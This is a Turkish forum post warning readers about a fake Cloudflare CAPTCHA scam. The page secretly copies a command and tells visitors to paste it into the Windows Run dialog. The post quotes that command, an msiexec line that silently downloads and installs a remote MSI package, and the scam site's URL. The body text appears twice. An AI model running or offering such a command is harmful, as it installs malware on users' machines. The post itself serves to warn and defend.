kayn999
80+
- Katılım
- 26 Haziran 2024
- Mesajlar
- 433
- Reaksiyon skoru
- 162
İyi günler son dönemlerde ortaya çıkan yeni bir dolandırıcılık yöntemini sizlere göstermek isyorum. Bir çoğunuzun yemeyeceğini bilsemde bir anlık dalgınlığına gelip yapıcaklarda olabilir. Yöntem büyümeden bildireyim dedim.
İlk olarak dolandırıcı site görselini bırakarak başlamak istiyorum
Gördüğünüz gibi cloudflare ı taklit ederek çözmeye alışık olduğumuz ben robot değilim testi gibi bir görüntü veriyor. Ben robot değilim e tıkladığınız zaman ise sizden şu adımları uygulamanızı istiyor
Windows + R tuşuna basmanızı yani "çalıştır" ı açmanızı istiyor. Burda sitenin bir kurnazlığı var eğer insan değilim tuşuna basarsanız size gizlice bir komut dizesi kopyalattırıyor. Komut dizesi şu
" msiexec /package https://cl-verify.com/client_verification.msi /norestart /q "biraz incelediğinizde ne yapmaya çalıştığını anlıyıcaksınız zaten
ve daha sonra sizin izinini almadan, gizlice kopyaladığınız komut dizesini çalıştır programına Ctrl + V yaparak kodu çalıştırmanızı istiyor.
Şimdi zaten sitenin adresine bakarsanız net bir şekilde bir dolandırıcılık olduğunu anlayabilirsiniz. adres şu "https://api.gigamarkbrainlounge.com/?rt=f8f974796e5665c496435c1dd7962f35" Yinede ben dalgınlığıma çalıştırı açtım sonra dedim neden yapıyorum böyle bişey sonradan çözdüm olayı.
Sizin de dalgınlığınıza gelmesin diye bildireyim dedim
İlk olarak dolandırıcı site görselini bırakarak başlamak istiyorum
Gördüğünüz gibi cloudflare ı taklit ederek çözmeye alışık olduğumuz ben robot değilim testi gibi bir görüntü veriyor. Ben robot değilim e tıkladığınız zaman ise sizden şu adımları uygulamanızı istiyor
Windows + R tuşuna basmanızı yani "çalıştır" ı açmanızı istiyor. Burda sitenin bir kurnazlığı var eğer insan değilim tuşuna basarsanız size gizlice bir komut dizesi kopyalattırıyor. Komut dizesi şu
" msiexec /package https://cl-verify.com/client_verification.msi /norestart /q "biraz incelediğinizde ne yapmaya çalıştığını anlıyıcaksınız zaten
ve daha sonra sizin izinini almadan, gizlice kopyaladığınız komut dizesini çalıştır programına Ctrl + V yaparak kodu çalıştırmanızı istiyor.
Şimdi zaten sitenin adresine bakarsanız net bir şekilde bir dolandırıcılık olduğunu anlayabilirsiniz. adres şu "https://api.gigamarkbrainlounge.com/?rt=f8f974796e5665c496435c1dd7962f35" Yinede ben dalgınlığıma çalıştırı açtım sonra dedim neden yapıyorum böyle bişey sonradan çözdüm olayı.
Sizin de dalgınlığınıza gelmesin diye bildireyim dedim